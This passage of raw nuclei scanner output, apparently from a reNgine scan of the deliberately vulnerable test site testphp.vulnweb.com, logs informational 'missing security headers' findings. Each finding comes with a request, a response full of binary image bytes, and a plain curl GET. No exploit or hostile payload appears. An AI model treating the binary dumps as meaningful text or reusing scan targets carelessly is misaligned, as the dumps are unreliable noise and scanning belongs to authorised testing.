\\u0015\\ufffd\\u0006\\u0016@G\\ufffd9\\u003c\\u001e\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGiz\\ufffdŔ:\\ufffd\\ufffdۥ\\ufffd\\ufffd\\ufffdT\\ufffd\\ufffdh\\ufffd\\ufffdz\\ufffd\\ufffd\\u0006=\\ufffdvFs\\ufffdr\\t\\ufffd4\\ufffds^\\ufffd7\\ufffd\\ufffdÝ\\ufffd\\u0011\\ufffdFW\\ufffd\\ufffd\\u003eT\\ufffd\\u000ct\\ufffdV$\\ufffd\\ufffdO\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\u0013\\u0008cc#M\\u0004\\ufffd\\u0019W\\ufffd\\ufffd\\ufffd\\ufffdGܮ\\u001c\\ufffd\\ufffd\\n~r(i\\ufffd\\ufffdjw\\u0006\\u0018Z\\u003c\\ufffd/\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffdx\\u0007\\u0004\\ufffdb21\\ufffd\\ufffdm\\ufffdu\\ufffdXZ\\ufffd*\\ufffdFھ\\ufffd\\ufffd\\u0000ҰEM\\ufffd\\ufffd$*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffdD}\\ufffd\\ufffdRzE\\u0003\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\u001a\\ufffd{\\ufffd0\\ufffd\\ufffd\\ufffds\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd(\\ufffd\\ufffdך\\ufffd\\u00063ڢ\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd\\\"\\ufffd(\\ufffd\\u0008\\ufffd\\ufffd(Bl\\ufffdmEE\\u0015Ġ\\ufffd\\u0006\\ufffd'=袄\\ufffd\\ufffd\\ufffd\\u000e\\ufffdw\\ufffdj\\ufffdwd\\ufffd:\\ufffdY\\u0018e%O(\\ufffdʜv\\ufffd\\u00020@5\\ufffd:\\ufffd6WWqDIX\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffdE\\u0015\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffdߴ\\ufffd+m6\\ufffd\\ufffde\\nč#;rX\\ufffd\\u001e\\ufffdI$\\ufffd\\ufffdw\\ufffd\\u0000\\u0006\\u0000\\ufffd\\\\0\\u0017\\ufffd7\\ufffd\\ufffdU\\u0003\\r\\u0018\\u000b\\ufffd\\ufffd\\u0011\\ufffd\\ufffd9\\u0018\\ufffd\\u0004w\\ufffd\\u003c`\\ufffd\\ufffdȾ$\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffdrțö\\u003e\\ufffdW\\ufffd\\ufffd\\u0013\\ufffdO.\\ufffd=\\ufffdП\\ufffd.\\ufffd\\u0004\\u0001\\ufffd\\ufffdc\\ufffdY!\\n\\ufffd\\ufffdWv\\ufffdv\\ufffd\\u0019e\\u0007\\ufffd\\u0015\\ufffd\\ufffdf\\ufffd\\ufffdӧ\\ufffd\\ufffdmn\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ݑ\\ufffd؁\\ufffd\\ufffd\\u003c`\\ufffd\\ufffd(\\ufffd:\\ufffd\\u0000\\ufffd\\u000f\\ufffdL\\ufffdOd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdigw|\\ufffd\\ufffd)\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u00078\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffd98\\ufffd@\\ufffdE\\u0015\\u0017\\ufffd1\\ufffd\\ufffd\\ufffdE\\ufffd\\u001f`\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\ufffd}\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:46.834621089Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"path\":\"/pictures/2.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"request\":\"GET /pictures/2.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1353\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-549\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001a\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0001\\u0003\\u0004\\u0005\\u0006\\ufffd\\ufffd\\u0000+\\u0010\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0000\\u0004\\u0007\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1AQ\\\"a\\u00142q\\ufffd\\u0005\\u0013$B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0003\\u0001\\u0002\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000'\\u0011\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0001\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1\\u0005Q\\u00132A\\\"#3aq\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffd\\ufffdd\\ufffdH䏺JU\\ufffd\\t\\u000f\\u0008\\ufffdi{\\u0015+f\\ufffd.7\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB6\\ufffd˨\\ufffd\\ufffd\\ufffd\\ufffd͒\\u001bdס\\u001a\\ufffdi\\ufffdE\\ufffdn\\ufffd_\\ufffd\\ufffd%\\u001atN\\u000c\\ufffdpR\\ufffdH\\u001d\\ufffd,֝\\ufffd\\u0000\\u0001 \\u0014\\u0000@'DQ\\u0003\\u0000Qu?b\\ufffd-\\u0010\\u0005\\ufffdL\\u0000\\u0000\\t\\u0000\\u0000\\u0000-\\u0005\\ufffd\\u0001\\ufffd\\ufffd\\u000cH\\ufffd'A\\u0015F\\ufffd\\u001a\\ufffdʔ?z3G\\ufffd^\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdK\\ufffd)\\ufffdۓ\\ufffdl\\ufffd%\\ufffd\\ufffd\\\"䨤\\ufffd\\u001f\\ufffdu\\u0015Ed44\\ufffd2\\u0005\\ufffdS\\ufffdD\\u0002Y\\u0005F\\ufffd`\\u0000\\u0000H\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\r\\u0011L`\\\"\\ufffd)4(\\u000cF\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003%C\\ufffd9\\ufffd\\ufffd1F\\ufffd$\\ufffdc$\\ufffd\\ufffd\\u000f\\ufffd~\\ufffdQ_\\ufffdק{c'K\\ufffd#\\ufffd\\ufffdr|\\ufffdR\\ufffd\\ufffd(\\ufffdԤ\\ufffdI}#;\\ufffd\\ufffdk\\ufffdʚ\\ufffd\\ufffdϳf\\ufffd\\ufffd\\ufffdEmZ\\u0010\\ufffd\\ufffd\\u0012Kȶ\\ufffdА\\ufffd\\ufffdC\\u0001Z\\u001a\\ufffdB\\u0000\\ufffd\\u0006Ҵ1I\\n\\u0004\\ufffd\\u0000X\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\ufffd\\u001com\\ufffd\\u0004\\ufffd,\\ufffd7\\u000e\\ufffd}\\ufffd\\\\1\\ufffd,\\ufffd\\u001f\\u0017\\ufffd\\ufffd#\\ufffdwG\\ufffdϫ\\ufffd\\u0016\\ufffd\\ufffd\\ufffddPf\\ufffd\\u003c\\u0013\\ufffdK\\ufffd\\ufffdG\\ufffd4j\\ufffd\\ufffd\\u001c\\ufffdi\\ufffd$\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffdj\\ufffd4C\\u000b\\ufffd\\ufffd\\ufffdg\\ufffd8\\ufffd`\\ufffd.\\ufffdΜy)\\ufffdN\\ufffd\\ufffd?\\ufffd\\ufffdj\\ufffd\\ufffd\\u001a\\ufffd*\\ufffdw\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd),\\u0012\\ufffd5b\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdg%\\ufffd\\ufffd[7e\\ufffdb\\ufffd\\u001a\\ufffd\\u0000/\\ufffd$\\ufffdfiƎ֛3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdХ\\ufffd5b\\ufffdޥ\\ufffd@%Ţ\\u0008\\u0019v\\u0000\\u0000\\u0000\\u0014E\\u0012\\u0000M\\ufffd(\\ufffd\\u0018\\u0008\\ufffdw1h\\ufffd\\ufffd(\\ufffd\\ufffd\\ufffd\\u001e\\u001a7\\ufffd\\ufffdC\\u001c\\ufffd\\ufffd\\ufffd_\\ufffd\\u000c{,\\ufffd\\ufffdَ[]\\ufffd\\ufffdkp\\ufffd\\ufffdp}\\u001d?ĹI\\ufffd\\ufffd'\\ufffd\\u0026\\ufffdjq\\ufffd\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdWO\\ufffd\\ufffd\\ufffd\\ufffdkV\\ufffd\\ufffd\\ufffd}\\u001bq\\ufffd|\\ufffdc]\\ufffdq5\\u0018\\ufffd\\ufffdp\\u0013\\ufffdJ\\ufffd\\u00003\\ufffd\\ufffd]Fhe\\ufffd\\u0018\\ufffd\\ufffdK\\ufffd4\\ufffd%r}\\ufffd\\ufffdW\\ufffd\\ufffdà\\ufffd\\ufffdd\\ufffdh\\ufffd}\\ufffd\\ufffd-\\ufffd\\\\\\ufffd\\ufffd\\u001c\\ufffdE\\ufffd\\ufffd+B\\ufffd+^\\ufffd4j\\ufffd\\ufffd\\u0004\\u0010\\ufffd}\\ufffd\\u0004\\u000cN\\ufffdqb\\ufffd\\u0000Qe?e`6\\ufffd\\u001b~Ȣې\\ufffd6߲v\\ufffd\\ufffd܄\\u0026\\ufffd\\ufffd\\u0014C\\ufffd\\ufffdJ\\ufffdx\\ufffd\\n\\u003enjlԑ\\ufffd\\ufffd5CEY\\ufffd3\\ufffd\\ufffdj=\\ufffd\\nʱ\\ufffd\\ufffdեj\\ufffdб\\ufffd\\u0000N\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffdp\\ufffd\\ufffd\\ufffdk3\\ufffd\\ufffdҾ\\ufffd9\\ufffd\\ufffd\\ufffd}3t\\ufffd\\ufffd\\ufffdψ\\ufffd2J4\\ufffdN\\rvt\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003e\\ufffdq\\ufffd%\\ufffd\\ufffd\\t\\ufffd\\ufffd\\u001fB\\ufffd\\ufffde\\ufffd\\u001bJ\\ufffd\\u001e\\ufffdQM\\\"(\\ufffd»^,]\\ufffde\\\\FG2k\\ufffdWAC\\ufffd\\r\\ufffd\\ufffd.\\ufffdbPQf\\ufffd\\ufffd\\ufffdt[^\\tP\\ufffd\\ufffdΣ\\ufffd(\\ufffd\\ufffd\\ufffd\\u00126\\ufffd6\\ufffdYlJ\\u0026\\ufffd\\ufffd\\ufffdI\\u0013D\\u003c\\ufffd\\ufffd\\ufffdd\\u0017 \\u0006\\ufffd\\ufffdp2\\ufffd\\u000e\\ufffd\\ufffdm%\\u000e6\\ufffd\\ufffd\\ufffduc\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd}\\ufffd\\ufffd\\u0000\\u001dl*⏝y\\ufffdJ\\u0019\\ufffdK\\ufffdNn\\ufffdN\\u0012x\\ufffd䋤rr%`\\u0006-W\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffdEd(\\ufffd\\u0003!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP\\ufffd8\\ufffd\\ufffdk\\ufffd\\ufffd\\u0005)\\ufffd?,\\u0000+\\ufffd\\ufffd\\ufffd;5\\u0012\\ufffd\\u000c2\\ufffd\\ufffd\\ufffd+\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u0000e\\ufffd2\\ufffd\\t7\\ufffd6-\\\"v\\ufffd\\u0001f\\ufffdd\\ufffd\\u0026ͺXA\\ufffd\\ufffd\\ufffdSh\\u0000~\\ufffd\\\\\\ufffdW\\ufffd\\ufffd\\ufffd%O\\ufffd\\ufffdr\\ufffd\\ufffdc\\u0014\\ufffd\\u0004\\u003eΌ\\u001b\\ufffdCHe\\u0014\\u0000\\u0008\\ufffd\\ufffd\\u0007\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:47.46108065Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"path\":\"/cgi-bin/1\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"request\":\"GET /cgi-bin/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:47.942893951Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin\",\"path\":\"/cgi-bin\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin\",\"request\":\"GET /cgi-bin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eForbidden\\u003c/h1\\u003e\\n\\u003cp\\u003eYou don't have permission to access this resource.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:47.942876955Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"path\":\"/pictures/1.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"request\":\"GET /pictures/1.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4355\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-1103\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0001\\u0005\\u0003\\u0004\\u0007\\u0002\\ufffd\\ufffd\\u00004\\u0010\\u0000\\u0002\\u0001\\u0003\\u0004\\u0001\\u0003\\u0003\\u0003\\u0003\\u0004\\u0001\\u0005\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!1A\\u0006\\u0013Q\\\"a\\ufffd\\u0014q\\ufffd2\\ufffd\\ufffd#BR\\ufffd\\ufffd\\u0016b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0019\\u0001\\u0000\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0005\\ufffd\\ufffd\\u0000)\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0002\\u0005\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0012A\\u0005\\u0013Q\\ufffd\\ufffd2aq\\ufffd\\\"3\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u003e\\ufffd\\ufffdn?\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ԝB\\ufffdw\\u0018Va\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd.\\ufffdH\\ufffdn\\t \\ufffd\\ufffdr2s\\ufffd\\u0006\\ufffd\\ufffdP\\u0003z\\ufffd\\ufffd8\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0006$}#\\ufffd\\ufffd\\ufffd\\ufffdW\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd\\ufffdc ʸʮ\\u003c\\ufffd\\ufffd\\ufffd\\ufffd׹Er\\ufffd\\n/\\ufffdI\\ufffd\\ufffd\\ufffdj\\ufffd\\u0026\\ufffd\\ufffd\\ufffddY\\u0019@\\ufffdW\\ufffd\\ufffd#\\ufffdr\\u003e\\ufffdϚ\\ufffd\\ufffdlN^}\\ufffd\\u0015\\ufffd#3(|g\\ufffdp0rpO\\ufffd\\ufffdf\\ufffd\\ufffd}%%\\ufffd\\u0006kIE\\ufffdf\\ufffd\\u0010\\ufffd\\u0003\\ufffd\\ufffd\\u0007\\u001f\\ufffd\\ufffd\\u0006\\ufffdzf\\ufffd\\ufffd^\\ufffdC%Ƕ\\ufffd\\u0019\\u00140;C\\u001d\\ufffd\\u0018\\ufffd?\\ufffd\\ufffd\\ufffdz\\ufffd\\\\\\\\[\\ufffd\\ufffd\\u00025\\ufffdy.\\\\\\ufffd\\u00169۟\\ufffd8\\u001fڮ\\ufffd?\\ufffd\\u0019L3\\\\\\ufffd\\ufffd\\ufffd\\u0019#\\u00110\\ufffd\\\\x\\ufffd\\ufffd8\\ufffd#\\ufffd\\u001b\\ufffdZ\\u0015Ʃ|\\ufffd\\u001e5 夑\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdդ\\ufffd=\\u003e\\ufffd\\u001bI\\ufffdi\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n2\\u0006\\u0007۳\\ufffdO^(\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffdP\\ufffd.\\ufffd\\ufffd_fEUR\\u0002}9\\ufffd\\ufffdr6\\ufffd\\ufffd\\ufffd\\ufffd\\u003ej\\ufffdg\\ufffd$g\\ufffd\\u0017$\\ufffd\\u000e\\ufffd{\\ufffd\\ufffd[\\ufffdL\\ufffd\\ufffd\\ufffd9\\ufffd,sXi\\u0026\\u0014y\\ufffd\\ufffd\\ufffdT\\ufffdb*E\\u0014VH\\ufffd\\ufffd퍌\\ufffdI,\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffd0\\u0007\\u0007\\ufffd\\ufffd\\ufffd?\\ufffd\\u0015\\ufffd;\\ufffd\\ufffd\\u0017]\\ufffdJ\\ufffdX\\ufffd\\ufffdFd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$`c\\ufffd\\ufffd2\\ufffd0գ\\ufffd7\\u0016\\ufffdnח\\\"ј;2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp;'9\\u0018\\ufffdz\\ufffd\\u0014\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd[)\\ufffd3Z\\ufffdorEY\\u000c\\ufffd\\u001e|\\u0011\\ufffdq\\ufffd|\\u001e\\ufff